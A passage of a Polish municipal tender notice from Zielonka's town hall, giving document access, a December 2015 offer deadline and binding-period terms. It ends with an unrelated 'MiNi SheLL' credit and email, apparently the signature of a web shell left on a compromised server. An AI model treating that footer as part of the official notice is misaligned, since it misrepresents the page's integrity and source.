jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez wykonawcę.
c)	zmiany terminu rozpoczęcia realizacji zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.zielonka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Zielonka ul. Lipowa 5 pok. 304.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.12.2015 godzina 10:00, miejsce: Urząd Miasta Zielonka ul. Lipowa 5 pok. Nr 1 Biuro Obsługi Interesanta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com